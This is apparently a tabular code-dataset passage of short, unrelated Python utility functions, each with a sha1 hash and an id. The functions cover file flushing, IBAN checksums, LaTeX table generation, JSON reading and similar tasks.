content
stringlengths 35
416k
| sha1
stringlengths 40
40
| id
int64 0
710k
|
|---|---|---|
def fileflush(filed, residue, end=False):
"""
Flush a file descriptor
@params:
`filed` : The file handler
`residue`: The remaining content of last flush
`end` : The file ends? Default: `False`
"""
filed.flush()
# OSX cannot tell the pointer automatically
filed.seek(filed.tell())
lines = filed.readlines() or []
if lines:
lines[0] = residue + lines[0]
residue = '' if lines[-1].endswith('\n') else lines.pop(-1)
if residue and end:
lines.append(residue + '\n')
residue = ''
elif residue and end:
lines.append(residue + '\n')
residue = ''
return lines, residue
|
03c0309324e0ed2db86c03967678299a6686be17
| 28,746
|
import re
def _ParsePercent(fixed_or_percent_str):
"""Retrieves percent value from string."""
if re.match(r'^\d+%$', fixed_or_percent_str):
percent = int(fixed_or_percent_str[:-1])
return percent
return None
|
360741f7cb179d76e2c3bc89eb263d009734baeb
| 28,747
|
import importlib
def resolve(name):
"""Convert a dotted module path to an object.
This is used to do the importing, when :class:`Tool` resolves
the path to a command implementation.
"""
if not isinstance(name,str):
return name
p = name.rfind('.')
if p > 0:
mod = name[:p]
cls = name[p+1:]
m = importlib.import_module(mod)
target = getattr(m,cls)
else:
target = globals()[name]
return target
|
f133173377cac7b2ad3c3ed3d27b55c4c67bb8f2
| 28,748
|
def firm_size_quintile(firm_mcap, mcap_list):
"""
Quintile number (1-5) of firm_mcap within sorted mcap_list
Returns INTEGER
"""
firm_mcap_index = mcap_list.index(firm_mcap)
quintile_number = 1
boundary_index = (len(mcap_list) * quintile_number) // 5
while quintile_number < 5:
if firm_mcap_index < boundary_index:
return quintile_number
quintile_number += 1
boundary_index = (len(mcap_list) * quintile_number) // 5
return quintile_number
|
a084eb70fc9385443a4dd49a05c563bf4699b076
| 28,749
|
import math
def debitmask(input_int,num_bits = False):
"""
| takes a bitmask and returns a list of which bits are switched.
| reads from left to right e.g. 2 = [0, 1] not [1, 0].
"""
if num_bits == False and input_int>0:
num_bits = int(math.ceil(math.log(input_int+1,2)))
elif input_int == 0:
return [0]
result_array = [0]*num_bits
for i in reversed(range(num_bits)):
if input_int - 2**i >= 0:
result_array[i] = 1
input_int -= 2**i
return result_array
|
68541f3b5cd14a92b44c0445e1f2856567bdb0be
| 28,750
|
import pkg_resources
def gobbli_version() -> str:
"""
Returns:
The version of gobbli installed.
"""
return pkg_resources.get_distribution("gobbli").version
|
2357e1fcca33e97fe970a42c20593d31c9a887c8
| 28,751
|
def patch_basic_types(basic_types, inp_version):
"""
Patch the _basic_types entry to correct ambigouities
:param schema_dict: dictionary produced by the fleur_schema_parser_functions (modified in-place)
:param inp_version: input version converted to tuple of ints
"""
if inp_version >= (0, 33):
#After this version the issue was solved
return basic_types
CHANGE_TYPES = {
(0, 32): {
'add': {
'KPointType': {
'base_types': ['float_expression'],
'length': 3
},
}
},
(0, 28): {
'add': {
'AtomPosType': {
'base_types': ['float_expression'],
'length': 3
},
'LatticeParameterType': {
'base_types': ['float_expression'],
'length': 1
},
'SpecialPointType': {
'base_types': ['float_expression'],
'length': 3
}
}
},
}
all_changes = {}
for version, changes in sorted(CHANGE_TYPES.items(), key=lambda x: x[0]):
if inp_version < version:
continue
version_add = changes.get('add', {})
version_remove = changes.get('remove', set())
all_changes = {key: val for key, val in {**all_changes, **version_add}.items() if key not in version_remove}
for name, new_definition in all_changes.items():
if name not in basic_types:
raise ValueError(f'patch_basic_types failed. Type {name} does not exist')
basic_types[name] = new_definition
return basic_types
|
d20ab88119bea457f799e84448875846dcc3d077
| 28,752
|
def render_compiled(compiled, variables):
"""Render from compiled template with interpolated variables."""
template, partials = compiled
return template(variables, partials=partials)
|
3c13acf96ac3b59bcd5c2a1f3f3dbc19fd210c80
| 28,753
|
def requirements(section=None):
"""Helper for loading dependencies from requirements files."""
if section is None:
filename = "requirements.txt"
else:
filename = f"requirements-{section}.txt"
with open(filename) as file:
return [line.strip() for line in file]
|
2e4b7f9f4d8c8d0cd3cfa749f03785d2bba6a26b
| 28,754
|
def route(rule, **options):
"""Like :meth:`Flask.route` but for nereid.
.. versionadded:: 3.0.7.0
Unlike the implementation in flask and flask.blueprint route decorator does
not require an existing nereid application or a blueprint instance. Instead
the decorator adds an attribute to the method called `_url_rules`.
.. code-block:: python
:emphasize-lines: 1,7
from nereid import route
class Product:
__name__ = 'product.product'
@classmethod
@route('/product/<uri>')
def render_product(cls, uri):
...
return 'Product Information'
"""
def decorator(f):
if not hasattr(f, '_url_rules'):
f._url_rules = []
f._url_rules.append((rule, options))
return f
return decorator
|
c7f33af4e8fa10090e5b6a90532707fd59688885
| 28,755
|
def remap_column_names(data_names, name_map):
""" Remap data array column names using dictionary map.
For each column name that matches a key in name_map, the column name is replaced with
that key's value.
Args:
data_names (str, nx1 tuple): list of column names taken from structured np array
name_map (dict): dictionary with keys matching history file column names to be
replaced by the corresponding values
Returns:
(str, nx1 tuple): New list of column names
"""
return tuple(name_map.get(name, name) for name in data_names)
# get(name, name) means it will keep the current name if not found in dictionary
|
4863d8b9ce1986df4bd85f543014208428ea85cb
| 28,756
|
def tablefragment(m,signalRegions,skiplist,chanStr,showPercent,label="",caption=""):
"""
main function to transfer the set of numbers/names (=m provided by SysTable) into a LaTeX table
@param m Set of numbers/names provided by SysTable
@param signalRegions List of channels/regions used
@param skiplist List of parameters/members of 'm' to be skipped (such as 'sqrtnobsa') when showing per-systematic errors
@param chanStr String of all channels used, to be used in label of table
@param showPercent Boolean deciding whether to show percentage for each systematic
"""
tableline = ''
tableline += '''
\\begin{table}
\\centering
\\small
\\begin{tabular*}{\\textwidth}{@{\\extracolsep{\\fill}}l'''
"""
print the region names
"""
for region in signalRegions:
tableline += "c"
tableline += '''}
\\toprule
\\textbf{Uncertainty of channel} '''
"""
print the total fitted (after fit) number of events
"""
for region in signalRegions:
tableline += " & " + region.replace('_',r'\_') + " "
tableline += ''' \\\\
\\midrule
%%'''
tableline += '''
Total background expectation '''
for region in signalRegions:
tableline += " & $" + str("%.2f" %m[region]['nfitted']) + "$ "
tableline += '''\\\\
%%'''
tableline += ''' \\\\
\\midrule
%%'''
"""
print sqrt(N_obs) - for comparison with total systematic
"""
tableline += '''
Total statistical $(\\sqrt{N_{\\mathrm{exp}}})$ '''
for region in signalRegions:
tableline += " & $\\pm " + str("%.2f" %m[region]['sqrtnfitted']) + "$ "
tableline += '''\\\\
%%'''
"""
print total systematic uncertainty
"""
tableline += '''
Total background systematic '''
for region in signalRegions:
percentage = (
m[region]["totsyserr"] / m[region]["nfitted"] * 100.0
if m[region]["nfitted"] > 0
else 0
)
tableline += (
" & $\\pm "
+ str("%.2f" % m[region]["totsyserr"])
+ r"\ ["
+ str("%.2f" % percentage)
+ "\\%] $ "
)
tableline += ''' \\\\
\\midrule
%%'''
"""
print systematic uncertainty per floated parameter (or set of parameters, if requested)
"""
d = m[signalRegions[0]]
m_listofkeys = sorted(iter(d.keys()), key=lambda k: d[k], reverse=True)
for name in m_listofkeys:
if name not in skiplist:
printname = name
printname = printname.replace('syserr_','')
printname = printname.replace('_',r'\_')
for index,region in enumerate(signalRegions):
if index == 0:
tableline += "\n" + printname + " "
if not showPercent:
tableline += " & $\\pm " + str("%.2f" %m[region][name]) + "$ "
else:
percentage = m[region][name]/m[region]['nfitted'] * 100.0 if m[region]['nfitted']>0. else 0.
if percentage <1:
tableline += " & $\\pm " + str("%.2f" %m[region][name]) + r"\ [" + str("%.2f" %percentage) + "\\%] $ "
else:
tableline += " & $\\pm " + str("%.2f" %m[region][name]) + r"\ [" + str("%.1f" %percentage) + "\\%] $ "
if index == len(signalRegions)-1:
tableline += '''\\\\
%%'''
"""
print table end with default Caption and Label
"""
if caption =="":
caption="""Breakdown of the dominant systematic uncertainties on background estimates in the various signal regions.
Note that the individual uncertainties can be correlated, and do not necessarily add up quadratically to
the total background uncertainty. The percentages show the size of the uncertainty relative to the total expected background."""
if label =="":
label="table.results.bkgestimate.uncertainties.%s"%(chanStr)
tableline += """
\\bottomrule
\\end{tabular*}
\\caption{"""+caption+"""}
\\label{"""+label+r"""}
\end{table}"""
return tableline
|
cdb7165000aef16e718c3895a0dea45abe8764a4
| 28,757
|
def reference_to_schema_name(reference_name):
"""This function will eventually identify the schema associated with `reference_name`
unless replaced by similar functionality in the models package.
Returns None meaning "default/core schema"
"""
return None
|
08acdad8df4baef2ed44c29b7974a5619038a2e1
| 28,758
|
def get_key(row, columns, numeric_column):
"""Get sort key for this row
"""
if(numeric_column):
return [int(row[column]) for column in columns]
else:
return [row[column] for column in columns]
|
ba03215956bbd3adb0acd9d086875c2978e48c05
| 28,759
|
def ha_write_config_file(config, path):
"""Connects to the Harmony huband generates a text file containing all activities and commands programmed to hub.
Args:
config (dict): Dictionary object containing configuration information obtained from function ha_get_config
path (str): Full path to output file
Returns:
True
"""
with open(path, 'w+', encoding='utf-8') as file_out:
file_out.write('Activities\n')
for activity in config['activity']:
file_out.write(' ' + activity['id'] + ' - ' + activity['label'] + '\n')
file_out.write('\nDevice Commands\n')
for device in config['device']:
file_out.write(' ' + device['id'] + ' - ' + device['label'] + '\n')
for controlGroup in device['controlGroup']:
for function in controlGroup['function']:
file_out.write(' ' + function['name'] + '\n')
return True
|
7733430b0b64dc04cb398fc177e103e3d64d19b6
| 28,761
|
def radical(n, *args, **kwds):
"""
Return the product of the prime divisors of n.
This calls ``n.radical(*args, **kwds)``. If that doesn't work, it
does ``n.factor(*args, **kwds)`` and returns the product of the prime
factors in the resulting factorization.
EXAMPLES::
sage: radical(2 * 3^2 * 5^5)
30
sage: radical(0)
Traceback (most recent call last):
...
ArithmeticError: Radical of 0 not defined.
sage: K.<i> = QuadraticField(-1)
sage: radical(K(2))
i + 1
The next example shows how to compute the radical of a number,
assuming no prime > 100000 has exponent > 1 in the factorization::
sage: n = 2^1000-1; n / radical(n, limit=100000)
125
"""
try:
return n.radical(*args, **kwds)
except AttributeError:
return n.factor(*args, **kwds).radical_value()
|
846549ba03bcc38cd25a49cb5a2bd51c16cc2e54
| 28,762
|
import os
def define_preview(define_input, define_along, define_across):
"""
Define information for previewing an interpolation run. Fill the relevant
dictionaries and pass it to the automatic routines. Full explanation of options
is also given in `create_inputfile.py`, block 5.
"""
# ==================================================================================
# BLOCK 1: Grid and limits for subgrid
# ==================================================================================
# The path to the grid to be used by BASTA
define_input["gridfile"] = os.path.join(
os.environ["BASTADIR"], "grids", "Garstec_16CygA.hdf5"
)
# If the inputted grid is BaSTI isochrones, specify the science case. See
# `create_inputfile.py` block 2c for available cases by standard
# define_input["odea"] = (0, 0, 0, 0)
# Construction of interpolated grid(s). There are to options:
# - "bystar" for an interpolated grid for each star in the input file
# - "encompass" for a single grid spanning all of the stars
define_input["construction"] = "bystar"
# Define limits of subgrid to be interpolated, within the full grid.
# Primarely to avoid spending a large amount of time interpolating in regions that
# are not close to the fitted star(s).
define_input["limits"] = {
"Teff": {"abstol": 150},
"FeH": {"abstol": 0.2},
"dnufit": {"abstol": 8},
}
# Take ascii-file input in order to do "abstol" and "sigmacut" in limits
# If no limits are given in terms of "abstol" or "sigmacut" this can be ignored
define_input["asciifile"] = os.path.join("data", "16CygA.ascii")
define_input["params"] = (
"starid",
"RA",
"DEC",
"numax",
"numax_err",
"dnu",
"dnu_err",
"Teff",
"Teff_err",
"FeH",
"FeH_err",
"logg",
"logg_err",
)
# Output-path
outpath = os.path.join("output", "preview_interp_MS")
# ==================================================================================
# BLOCK 2: Controls for along interpolation
# ==================================================================================
# To compare the current resolution along a track/isochrone with an inputted value,
# switch this option on
along_interpolation = True
if along_interpolation:
# Resolution parameters to preview current resolution for.
# Input any list of parameters, "freqs" for viewing the spacing in the l=0 modes
# in the models. Compares to the inputted value.
define_along["resolution"] = {
"freqs": 0.5,
# "dnufit": 0.04,
# "age": 20,
}
# Location, name and format of the outputted figure (histogram)
# Use either .png (fast) or .pdf (high resolution) format, .png by default
define_along["figurename"] = os.path.join(
outpath, "interp_preview_along_resolution.pdf"
)
# ==================================================================================
# BLOCK 3: Controls for across interpolation
# ==================================================================================
# To compare the current gridresolution with what would be obtained given the input
across_interpolation = True
if across_interpolation:
# Definition of the increase in resolution. "scale" for Sobol sampling with the
# given multiplicative increase in the number of tracks/isochrones. For
# Cartesian sampling, define the increase in number of tracks between current
# points, e.g. "FeHini": 2 will result three times the number of tracks
define_across["resolution"] = {
"scale": 6,
}
# Location, name and format of the outputted figure (histogram)
# Use either .png (fast) or .pdf (high resolution) format, .png by default
define_across["figurename"] = os.path.join(
outpath, "interp_preview_across_resolution.pdf"
)
# Done! Nothing more to specify.
return define_input, define_along, define_across
|
888bd2456f8f7c5c2fa83f7407aa401557661090
| 28,763
|
def nested_conditionals(conditional_A, conditional_B, conditional_C, conditional_D):
"""
Verbose, less readable test function
"""
if (conditional_A):
if (conditional_B):
if (conditional_C) and (conditional_D):
return True
else:
return False
else:
return False
else:
return False
|
1003f0d1b73f84d0dadd26ba9052556787038214
| 28,765
|
import requests
def count():
"""
Returns the number of songs on chorus.fightthe.pw
"""
return requests.get(r'https://chorus.fightthe.pw/api/count')
|
40f4e77cda56db9567aa530fdcc4fc477227e8a9
| 28,766
|
import sys
import inspect
def call_prepare_arguments(func, parser, sysargs=None):
"""Call a prepare_arguments function with the correct number of parameters.
The ``prepare_arguments`` function of a verb can either take one parameter,
``parser``, or two parameters ``parser`` and ``args``, where ``args`` are
the current arguments being processed.
:param func: Callable ``prepare_arguments`` function.
:type func: Callable
:param parser: parser which is always passed to the function
:type parser: :py:class:`argparse.ArgumentParser`
:param sysargs: arguments to optionally pass to the function, if needed
:type sysargs: list
:returns: return value of function or the parser if the function
returns None.
:rtype: :py:class:`argparse.ArgumentParser`
:raises: ValueError if a function with the wrong number of parameters
is given
"""
func_args = [parser]
# If the provided function takes two arguments and args were given
# also give the args to the function
# Remove the following if condition and keep else condition once Xenial is
# dropped
if sys.version_info[0] < 3:
arguments, _, _, defaults = inspect.getargspec(func)
else:
arguments, _, _, defaults, _, _, _ = inspect.getfullargspec(func)
if arguments[0] == 'self':
del arguments[0]
if defaults:
arguments = arguments[:-len(defaults)]
if len(arguments) not in [1, 2]:
# Remove the following if condition once Xenial is dropped
if sys.version_info[0] < 3:
raise ValueError("Given function '{0}' must have one or two "
"parameters (excluding self), but got '{1}' "
"parameters: '{2}'"
.format(func.__name__,
len(arguments),
', '.join(inspect.getargspec(func)[0])))
raise ValueError("Given function '{0}' must have one or two "
"parameters (excluding self), but got '{1}' "
"parameters: '{2}'"
.format(func.__name__,
len(arguments),
', '.join(inspect.getfullargspec(func)[0])))
if len(arguments) == 2:
func_args.append(sysargs or [])
return func(*func_args) or parser
|
ebf598acf3acf0364f8b07b115863736497ee354
| 28,767
|
import os
def is_under_tmux() -> bool:
"""
Return `True` if running under tmux.
"""
return os.getenv("TMUX", "").strip() != ""
|
51683e5333b02561b98913f8b6dd4c206a768549
| 28,768
|
def findPeakCluster(index, build_list, df, peak_gap):
"""
Recursively finds members of a peak cluster starting from the peak with
the smallest size.
Parameters
----------
index : TYPE Integer
DESCRIPTION. The index of df that corresponds to the
rows (i.e. peaks) that are clustered (within peak_gap
of each other) and awaiting to be processed to give
fewer peaks.
build_list : TYPE List
DESCRIPTION. List of index of peaks in peak clusters
df : TYPE Pandas dataframe
DESCRIPTION. Dataframe of cleaned GeneScan datasheet.
peak_gap : TYPE Integer
DESCRIPTION. User-supplied. A pair of peaks within peak_gap of
each other will be processed to give one peak.
Returns
-------
TYPE List
A list of index corresponding to peaks in a peak cluster.
"""
# Return build_list if we reach the end of dataframe
if index == max(df.index):
return list(set(build_list))
# Stop recursion when next peak is not within peak_gap of current peak
elif df.loc[index + 1, "Size"] - df.loc[index, "Size"] > peak_gap:
return list(set(build_list))
# Recursion to next peak
else:
build_list += [index, index + 1]
return findPeakCluster(index + 1, build_list, df, peak_gap)
|
f808d67a234df45f117b653ca16890ce9c4e982e
| 28,769
|
import os
import dill
import inspect
import pickle
def pickle_custom_metrics(metrics, filename):
"""Pickle the metrics if there is callable in the list of metrics
Args:
metrics (list): List of metrics
filename (str): Path to dump the pickled file
Return:
"""
metric_callable = False
for metric in metrics:
if callable(metric):
metric_callable = True
break
if metric_callable and not os.path.exists(filename):
metric_names = []
function_string = []
function_path = []
count = 0
for metric in metrics:
if isinstance(metric, str):
metric_names.append(metric)
elif callable(metric):
metric_names.append(count)
function_string.append(dill.dumps(metric, recurse=True))
if not os.path.dirname(inspect.getabsfile(metric)) in function_path:
function_path.append(os.path.dirname(inspect.getabsfile(metric)))
count += 1
metric_data = {'names': metric_names,
'function_string': function_string,
'function_path': function_path}
with open(filename, 'wb') as fid:
pickle.dump(metric_data, fid)
return metric_callable
|
c34179e905e8a2184c4fdddd2152d6f0e012d7b8
| 28,770
|
def clamp(low, high, x):
"""
Clamps a number to the interval [low, high]
"""
return low if x < low else (high if x > high else x)
|
1393af569f83369a7aa0c22cfaded9ed8e9d112a
| 28,771
|
import os
def get_command_output(cmd: str, redirect_error: bool = False) -> str:
"""Return the command line output of a command."""
try:
with os.popen(
"{}{}".format(cmd, " 2> /dev/null" if redirect_error else "")
) as f:
return f.read()
except:
return ""
|
44a89f88f4fd6d2778d4bbc0cf305e5a4c82871d
| 28,772
|
def valid(neighbor, rows, columns):
"""Find out if neighbor cell is valid
Args:
neighbor (List of integers): Neighboring cell position
rows (int): Number of rows on the board
columns (int): Number of columns on the board
Returns:
[boolean]: True if valid, False otherwise
"""
if neighbor[0] < 0 or neighbor[1] < 0:
return False
if neighbor[0] >= rows or neighbor[1] >= columns:
return False
return True
|
5f832c2a8b06aa98e378c1614078e36f8a9fc2e5
| 28,773
|
import functools
import warnings
def deprecated(func, replacement="", message="{name} is deprecated."):
"""This is decorator marks functions as deprecated."""
msg = message.format(name=func.__name__)
if replacement != "":
msg += " "
msg += replacement
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg,
category=DeprecationWarning,
stacklevel=2)
return func(*args, **kwargs)
return wrapper
|
80669a19fc070f2c2aa8bfb1e9067cc65512dec3
| 28,774
|
def itb(num: int, length: int):
#print(num)
"""
Converts integer to bit array
Someone fix this please :D - it's horrible
:param num: number to convert to bits
:param length: length of bits to convert to
:return: bit array
"""
if num >= 2**length:
num = 2**length - 1
if num < 0:
num = 0
num = int(num)
if length == 13:
return [int(i) for i in '{0:013b}'.format(num)]
if length == 16:
return [int(i) for i in '{0:016b}'.format(num)]
if length == 17:
return [int(i) for i in '{0:017b}'.format(num)]
if length == 23:
return [int(i) for i in '{0:023b}'.format(num)]
|
b9866a9765c38ada3fe81d50ba4224d5823af180
| 28,775
|
def get_sample_name(filename):
"""Extract sample name from filename."""
return filename.split('/')[-1].split('.')[0]
|
378dd429f0796930bfeb24e3a8fa51bcde32fb60
| 28,777
|
import re
def getTags(text):
""" Grep the tags in text and return them as a dict """
# 'Name' 'Version' 'Type' 'Author' 'Origin' 'Category' 'ID'
# 'URL' 'Desc' 'Date' 'Flags' 'RefCount' 'Signature' 'MASFile'
# 'BaseSignature' 'MinVersion'
# Name=134_JUDD
tags = {}
for line in text:
m = re.match(r'(.*) *= *(.*)', line)
if m:
tags[m.group(1)] = m.group(2)
#print(m.group(1), m.group(2))
return tags
|
92a536b36e0c9ea78bef1ffd97ff69d4e448a0ac
| 28,778
|
def _filter_none_elems_from_dict(dict_: dict):
""" Given a dict (call it m), returns a new dict which contains all the
non-null (non-none) elements of m.
Args:
dict_: The dict to return the non-null elements of.
Returns:
A new dict with all the non-null elements of <dict_>.
"""
return {k: v for k, v in dict_.items() if v is not None}
|
a8b95a1e9f36e90b5c96a4e95b05fcba069d4a93
| 28,779
|
def _event_QComboBox(self):
"""
Return QCombobox change event signal
"""
return self.currentIndexChanged
|
f3d220db6642f065b3c2201bab9614fa8bde288b
| 28,781
|
def range_filter(field, gt=None, gte=None, lt=None, lte=None):
"""
You must specify either gt (greater than) or gte (greater than or
equal to) and either lt or lte.
"""
return {"range": {field: {
k: v for k, v in {'gt': gt, 'gte': gte, 'lt': lt, 'lte': lte}.items()
if v is not None
}}}
|
08052a50335e8b98e32a64fb7fd2031eb9919e7e
| 28,782
|
def check_layout_layers(layout, layers):
"""
Check the layer widget order matches the layers order in the layout
Parameters
----------
layout : QLayout
Layout to test
layers : napari.components.LayerList
LayersList to compare to
Returns
----------
match : bool
Boolean if layout matches layers
"""
layers_layout = [
layout.itemAt(2 * i - 1).widget().layer
for i in range(len(layers), 0, -1)
]
return layers_layout == list(layers)
|
7d5c3ed65e0588f430341345d6e0fb0856aacaeb
| 28,784
|
def isSignedOff(message):
"""
Check whether a commit message contains Signed-off-by tag
"""
for line in message.splitlines():
if line.startswith('Signed-off-by'):
return True
return False
|
79248d9438ac1fc1cbce18ae8af236f0960d42e2
| 28,785
|
def outsideprocess(func):
"""Annotation to mark a job function. Only functions marked with this annotation are accepted as jobs."""
func._outsideprocess = True
return func
|
31848ee04170661ef319fcbbe54086c34c99f102
| 28,787
|
import logging
def create_portfolio(client, portfolio_conf, region):
"""
To create the portfolio
:param client:
:param portfolio_conf:
:param region:
:return:
"""
response = client.create_portfolio(
DisplayName=portfolio_conf['Name'],
Description=portfolio_conf['Description'],
ProviderName=portfolio_conf['Provider']
)
portfolio_id = response['PortfolioDetail']['Id']
logging.info("portfolio {} created in region {}".format(portfolio_conf['Name'], region))
return portfolio_id
|
892f3742da9d3d17957a0b5ca688ae74caef3cc8
| 28,788
|
def num_to_list(integer):
"""changes a number to a list - a quasi inverse of the list_to_num"""
result = [0 for _ in range(3)]
result[integer] = 1
return result
|
d65fb981f6f1a3f759968424e8c833d86abd63da
| 28,789
|
def categorize_by_damage(hurricanes):
"""Categorize hurricanes by damage and return a dictionary."""
damage_scale = {0: 0,
1: 100000000,
2: 1000000000,
3: 10000000000,
4: 50000000000}
hurricanes_by_damage = {0:[],1:[],2:[],3:[],4:[],5:[]}
for cane in hurricanes:
total_damage = hurricanes[cane]['Damage']
if total_damage == "Damages not recorded":
hurricanes_by_damage[0].append(hurricanes[cane])
elif total_damage == damage_scale[0]:
hurricanes_by_damage[0].append(hurricanes[cane])
elif total_damage > damage_scale[0] and total_damage <= damage_scale[1]:
hurricanes_by_damage[1].append(hurricanes[cane])
elif total_damage > damage_scale[1] and total_damage <= damage_scale[2]:
hurricanes_by_damage[2].append(hurricanes[cane])
elif total_damage > damage_scale[2] and total_damage <= damage_scale[3]:
hurricanes_by_damage[3].append(hurricanes[cane])
elif total_damage > damage_scale[3] and total_damage <= damage_scale[4]:
hurricanes_by_damage[4].append(hurricanes[cane])
elif total_damage > damage_scale[4]:
hurricanes_by_damage[5].append(hurricanes[cane])
return hurricanes_by_damage
|
be4371b983f34bc054e5bea94c3b9d1973272cc5
| 28,792
|
from typing import List
def check_numerics(numerics: List[int], min: int, max: int) -> List[int]:
"""Check that everything in the list is in bounds"""
s = sorted(numerics)
if s[0] < min or s[-1] > max:
raise Exception(
f"Out of bounds numbers in list {numerics}, min: {min}, max: {max}"
)
return s
|
85588e099752167302220479244682e3129698d1
| 28,793
|
import requests
import sys
def consumer_is_healthy(burrow, consumer):
"""Return true if consumer is healthy"""
res = requests.get("{}/consumer/{}/status".format(burrow, consumer))
if res.status_code != 200:
print("Did not find consumer {}, aborting!".format(consumer))
sys.exit(1)
all_good = res.json().get("status", {}).get("status", None) == "OK"
if not all_good:
print("Consumer {} is not healthy!".format(consumer))
return all_good
|
e726878bd06a25eaea12a924e038b1f7179f1269
| 28,794
|
def read_file(file_path):
"""
Reads input file.
Args:
file_path (str): path of input file.
Returns:
list: content of the file.
"""
with open(file_path, 'r') as file:
return file.read().strip().split('\n')
|
27008dcbd9bd9336240e68c9514ae6170c18df78
| 28,795
|
def get_cache_backend(class_path, **kwargs):
"""This method initializes the cache backend from string path informed."""
parts = class_path.split('.')
module = __import__('.'.join(parts[:-1]), fromlist=[parts[-1]])
cls = getattr(module, parts[-1])
return cls(**kwargs)
|
133ff883f0705d2e7ef18f69253df33d1e1691d0
| 28,796
|
def get_attempt_data(all_gens):
"""
Extracts the attempt data of succesful generations
all_gens - dict of key nodeID
value list of (nodeID, createTime, attempts, (createID, sourceID, otherID, mhpSeq))
:return: dict of dicts
A dict with keys being nodeIDs and values being dictinoaries of the form
{Entanglement ID: Number of generation attempts}
"""
gen_attempts = {}
for nodeID, all_node_gens in all_gens.items():
for gen in all_node_gens:
attempts = gen[2]
ent_id = gen[-3:]
key = "{}_{}_{}".format(*ent_id)
if nodeID in gen_attempts:
gen_attempts[nodeID][key] = attempts
else:
gen_attempts[nodeID] = {key: attempts}
# For consistent output, create empty dict if no gens
if len(gen_attempts) == 0:
gen_attempts = {0: {}, 1: {}}
if len(gen_attempts) == 1:
if list(gen_attempts.keys())[0] == 0:
gen_attempts[1] = {}
else:
gen_attempts[0] = {}
return gen_attempts
|
8138ce8cdea37dffb45b67e4f1c046ae25754d57
| 28,797
|
import json
def read_json_file(filename):
"""Read JSON file
Read JSON file as dictionary
Args:
filename(str): Filename
Returns:
dict: Dictionary with file content
"""
with open(filename, 'r') as json_file:
json_str = json_file.read()
try:
parsed_json = json.loads(json_str)
except json.JSONDecodeError as err:
raise Exception(f"Could not read: {filename}; "
f"Error: {err}") from err
return parsed_json
|
dbc7360d44bb964f1d59186806f552c844d311e1
| 28,798
|
def interpret_action(action, ins):
"""Interpret classifier class: return length of input to consume + output."""
if action[0] == u'R':
return (1, ins)
elif action[0] == u'D':
return int(action[1:]), u''
elif action[0] == u'C':
return len(action[1:]), action[1:]
elif action[0] == u'I':
return 0, action[1:]
|
23cc2d14f6d49180cd6d680c266df12c95e2411f
| 28,800
|
def get_kit_application_list(kit_applicationTypes):
"""
translates any application shortcut keywords and returns all applications compatible with the kit as a list
"""
all_applications = kit_applicationTypes
if "AMPS_ANY" in kit_applicationTypes.upper():
all_applications = kit_applicationTypes.replace("AMPS_ANY", "AMPS;AMPS_DNA_RNA;AMPS_EXOME;AMPS_RNA")
application_list = all_applications.split(";")
return [value.encode('UTF8') for value in application_list]
|
1c2f2e79901a68490176efd6dbc400f6ad083f7c
| 28,801
|
def FindFieldDefByID(field_id, config):
"""Find the specified field, or return None."""
for fd in config.field_defs:
if fd.field_id == field_id:
return fd
return None
|
b49766575864dac1d65a8a245827d00fcd345be1
| 28,802
|
import os
def get_supervisor_ip():
"""Return the supervisor ip address."""
if "SUPERVISOR" not in os.environ:
return None
return os.environ["SUPERVISOR"].partition(":")[0]
|
bf6bed7f858012c0d97d392bf775fb69c41b9ecd
| 28,803
|
import numpy as np
def bootstrap(original_data, statistic, num_resamples):
"""
bootstrap some data
"""
out_data = []
for iteration in range(num_resamples):
data = np.random.choice(original_data, len(original_data))
stat = statistic(data)
out_data.append(stat)
return np.array(out_data)
|
8604febd55fe14bd140ff4bc3849d06879589bb0
| 28,804
|
def get_section_length(data):
"""Gets the section length from the given section data
Parses the given array of section data bytes and returns the section length.
"""
sl = (data[1] & int('00001111', 2)) << 8
sl = sl + data[2]
return sl
|
2e388ec7e11288fc22a284ebad1e478c0aadbc40
| 28,805
|
def _get_cmd_with_file(fn, algo, kernelonly=False):
"""
fn: file name of matrix
"""
cmd='./main -file=%s -algo=%s' % (fn, algo)
if kernelonly:
cmd = '%s -kernelonly=1'%cmd
if algo == 'mergepath' or algo == 'fixedrow4' or algo == 'fixedrow3':
cmd = '/home/shshi/downloads/merge-spmm/bin/gbspmm --iter 100 --mode %s %s' % (algo, fn)
return cmd
|
4cca3900b794f0f715851671ace6ee720db3e51b
| 28,807
|
def as_an_int(num1):
"""Returns the integer value of a number passed in."""
return int(num1)
|
32971d8def38efacb150ff511e400700f78c0907
| 28,808
|
def task_all():
"""Run all checks, then build the docs and release"""
return {"actions": [], "task_dep": ["tox", "docs", "build"]}
|
6ac4fb358328894b608461572a4eac4258a33e7e
| 28,809
|
import json
def dump_json(obj, format = 'readable'):
"""Dump json in readable or parseable format"""
# Parseable format has no indentation
indentation = None
sep = ':'
if format == 'readable':
indentation = 4
sep += ' '
return json.dumps(obj, indent = indentation, separators = (',', sep),
sort_keys = True)
|
2b6efb9202def6651bf4deb1ebc5e34f44c6c438
| 28,810
|
def format_element(eseq):
"""Format a sequence element using FASTA format (split in lines of 80 chr).
Args:
eseq (string): element sequence.
Return:
string: lines of 80 chr
"""
k = 80
eseq = [eseq[i:min(i + k, len(eseq))]for i in range(0, len(eseq), k)]
return("\n".join(eseq))
|
1e492b341d5ecea3f44ac9fe7246964a98f016a7
| 28,811
|
def validate_reset_payload(new_user):
""" this endpoint validates password reset payload """
# Check for empty current password
if new_user['current_password'] == '':
return {'message': 'Old Password Cannot be empty'}, 400
# Check for empty current password
elif new_user['new_password'] == '':
return {'message': 'New Password Cannot be empty'}, 400
|
caa23eb60bb36e4acc163a618fdeaaace2da2945
| 28,812
|
from typing import List
def _calculate_german_iban_checksum(
iban: str, iban_fields: str = "DEkkbbbbbbbbcccccccccc"
) -> str:
"""
Calculate the checksum of the German IBAN format.
Examples
--------
>>> iban = 'DE41500105170123456789'
>>> _calculate_german_iban_checksum(iban)
'41'
"""
numbers: List[str] = [
value
for field_type, value in zip(iban_fields, iban)
if field_type in ["b", "c"]
]
translate = {
"0": "0",
"1": "1",
"2": "2",
"3": "3",
"4": "4",
"5": "5",
"6": "6",
"7": "7",
"8": "8",
"9": "9",
}
for i in range(ord("A"), ord("Z") + 1):
translate[chr(i)] = str(i - ord("A") + 10)
for val in "DE00":
translated = translate[val]
for char in translated:
numbers.append(char)
number = sum(int(value) * 10 ** i for i, value in enumerate(numbers[::-1]))
checksum = 98 - (number % 97)
return str(checksum)
|
dd9edcc1047caae8822d7a70f02d934db67504db
| 28,813
|
def readTpsLog(fn):
"""
read in a file, line by line
"""
T = ""
with open(fn, "r") as f:
lines = f.readlines()
